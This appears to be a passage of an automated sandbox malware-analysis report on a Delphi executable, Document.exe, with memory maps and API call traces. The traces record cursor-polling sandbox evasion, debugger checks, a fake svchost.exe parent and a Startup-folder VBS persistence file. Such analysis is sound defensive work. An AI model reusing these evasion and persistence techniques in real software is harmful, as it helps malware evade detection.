private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Threads

Thread 0x820

138

0

»

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	1	Fn
Keyboard	Get Info	type = 0, result_out = 4	1	Fn
System	Get Info	type = Operating System	2	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.ENU, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, base_address = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceExA, address_out = 0x762b434f	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VariantChangeTypeEx, address_out = 0x76724c28	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7679c802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7679ec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76745934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7679d332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7679dbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7679e405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7679f00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7679f15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76745a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7679ecfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7679ee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7673b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarI4FromStr, address_out = 0x76736fab	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromStr, address_out = 0x767401a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR8FromStr, address_out = 0x7673699e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromStr, address_out = 0x76746ba7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyFromStr, address_out = 0x76766c12	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBoolFromStr, address_out = 0x7673dbd1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromCy, address_out = 0x76747fdc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromDate, address_out = 0x76737a2a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromBool, address_out = 0x76740355	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x77844413	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x77837d2f	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7784451a	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 256	1	Fn
Window	Create	window_name = Document, class_name = TApplication, wndproc_parameter = 0	1	Fn
Window	Set Attribute	window_name = Document, class_name = TApplication, index = 18446744073709551612, new_long = 1708015	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = AnimateWindow, address_out = 0x7784b531	1	Fn
Module	Get Handle	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75460000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitializeFlatSB, address_out = 0x7549266f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = UninitializeFlatSB, address_out = 0x75492542	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollProp, address_out = 0x75491d29	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollProp, address_out = 0x7549238d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_EnableScrollBar, address_out = 0x754920c9	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_ShowScrollBar, address_out = 0x75491fdb	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollRange, address_out = 0x75491e8d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollInfo, address_out = 0x75491f0f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollPos, address_out = 0x75491ccd	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollPos, address_out = 0x7549216d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollInfo, address_out = 0x754922be	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollRange, address_out = 0x754921e2	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetLayeredWindowAttributes, address_out = 0x7785ec88	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 255	1	Fn
Module	Load	module_name = C3taUqjCU7eqAyIdAPzjF1nHWemMrup9L3lp460T2.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = mzfjTcKYjWs7xdfL71cu9tmd9Cw, base_address = 0x0	1	Fn
Module	Get Address	module_name = Unknown module name, function = AZMOMSaCRwayip0wWNKiES7U, address_out = 0x0	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x77841218	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	2	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 667, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 882, y_out = 445	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
Module	Load	module_name = shell32, base_address = 0x76b00000	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Filename	module_name = Unknown module name, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 260	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\document\document.exe	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\document\document.exe	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, type = file_attributes	1	Fn
Mutex	Open	mutex_name = 1159BD3, desired_access = SYNCHRONIZE	1	Fn
System	Sleep	duration = 500 milliseconds (0.500 seconds)	1	Fn
File	Delete	filename = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	1	Fn

Process #7: document.exe

243

0

»

Information	Value
ID	#7
File Name	c:\users\aetadzjz\appdata\roaming\document\document.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:45, Reason: Child Process
Unmonitor	End Time: 00:03:13, Reason: Self Terminated
Monitor Duration	00:00:28

OS Process Information

»

Information	Value
PID	0x81c
Parent PID	0xbcc (c:\users\aetadzjz\appdata\roaming\svchost.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 600

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x00210fff	Private Memory	rwx	-
private_0x0000000000220000	0x00220000	0x0029ffff	Private Memory	rw	-
private_0x00000000002a0000	0x002a0000	0x0039ffff	Private Memory	-	-
private_0x00000000003a0000	0x003a0000	0x003affff	Private Memory	rw	-
pagefile_0x00000000003b0000	0x003b0000	0x003b6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003c0000	0x003c0000	0x003c1fff	Pagefile Backed Memory	rw	-
private_0x00000000003d0000	0x003d0000	0x003d0fff	Private Memory	rw	-
private_0x00000000003e0000	0x003e0000	0x003e0fff	Private Memory	rwx	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x003f7fff	Pagefile Backed Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x003f0fff	Private Memory	rw	-
document.exe	0x00400000	0x004b2fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000004c0000	0x004c0000	0x004d0fff	Private Memory	rw	-
pagefile_0x00000000004e0000	0x004e0000	0x004e7fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000004e0000	0x004e0000	0x004e0fff	Pagefile Backed Memory	rw	-
private_0x00000000004f0000	0x004f0000	0x004f0fff	Private Memory	rw	-
private_0x00000000004f0000	0x004f0000	0x0051afff	Private Memory	rw	-
private_0x0000000000520000	0x00520000	0x00520fff	Private Memory	rw	-
pagefile_0x0000000000530000	0x00530000	0x00530fff	Pagefile Backed Memory	rwx	-
private_0x0000000000540000	0x00540000	0x0063ffff	Private Memory	rw	-
pagefile_0x0000000000640000	0x00640000	0x007c7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007d0000	0x007d0000	0x00950fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000960000	0x00960000	0x01d5ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001d60000	0x01d60000	0x01e3efff	Pagefile Backed Memory	r	-
private_0x0000000001e40000	0x01e40000	0x01ea4fff	Private Memory	rw	-
private_0x0000000001ed0000	0x01ed0000	0x01edffff	Private Memory	rw	-
private_0x0000000001ee0000	0x01ee0000	0x020fffff	Private Memory	rw	-
pagefile_0x0000000001ee0000	0x01ee0000	0x01f0bfff	Pagefile Backed Memory	rwx	-
private_0x00000000020c0000	0x020c0000	0x020fffff	Private Memory	rw	-
private_0x0000000002100000	0x02100000	0x0232ffff	Private Memory	rw	-
staticcache.dat	0x02330000	0x02c5ffff	Memory Mapped File	r	-
pagefile_0x0000000002c60000	0x02c60000	0x03052fff	Pagefile Backed Memory	r	-
private_0x0000000003060000	0x03060000	0x2498ffff	Private Memory	-	-
private_0x0000000003060000	0x03060000	0x0b060fff	Private Memory	rw	-
sortdefault.nls	0x03060000	0x0332efff	Memory Mapped File	r	-
version.dll	0x74ba0000	0x74ba8fff	Memory Mapped File	rwx	-
dwmapi.dll	0x751f0000	0x75202fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
comctl32.dll	0x75460000	0x754e3fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
shell32.dll	0x76b00000	0x77749fff	Memory Mapped File	rwx	-
comdlg32.dll	0x77780000	0x777fafff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Created Files

»

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOCUMENT.vbs	0.14 KB	MD5: 6fe3ecd814abef913dd5064746ad05bc SHA1: 536cb57f4568328db82d729ab34f0753ab45e0a2 SHA256: eaf5fa6489fc6913be7dc196d71f0c22e36f8a8a48899be71a366d1e1112b141 SSDeep: 3:DG0VRmnwzFTUXoLqgBPN9lLenoJxzp4EaKC5NupEl0dAH2:DjinwtfPBPNCo/zpJaZ5NupE7W		... File Actions Show Properties Download

Threads

Thread 0x600

189

0

»

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	1	Fn
Keyboard	Get Info	type = 0, result_out = 4	1	Fn
System	Get Info	type = Operating System	2	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.ENU, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, base_address = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceExA, address_out = 0x762b434f	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VariantChangeTypeEx, address_out = 0x76724c28	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7679c802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7679ec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76745934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7679d332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7679dbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7679e405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7679f00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7679f15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76745a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7679ecfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7679ee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7673b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarI4FromStr, address_out = 0x76736fab	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromStr, address_out = 0x767401a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR8FromStr, address_out = 0x7673699e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromStr, address_out = 0x76746ba7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyFromStr, address_out = 0x76766c12	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBoolFromStr, address_out = 0x7673dbd1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromCy, address_out = 0x76747fdc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromDate, address_out = 0x76737a2a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromBool, address_out = 0x76740355	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x77844413	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x77837d2f	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7784451a	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 256	1	Fn
Window	Create	window_name = Document, class_name = TApplication, wndproc_parameter = 0	1	Fn
Window	Set Attribute	window_name = Document, class_name = TApplication, index = 18446744073709551612, new_long = 2166767	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = AnimateWindow, address_out = 0x7784b531	1	Fn
Module	Get Handle	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75460000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitializeFlatSB, address_out = 0x7549266f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = UninitializeFlatSB, address_out = 0x75492542	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollProp, address_out = 0x75491d29	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollProp, address_out = 0x7549238d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_EnableScrollBar, address_out = 0x754920c9	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_ShowScrollBar, address_out = 0x75491fdb	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollRange, address_out = 0x75491e8d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollInfo, address_out = 0x75491f0f	1	Fn
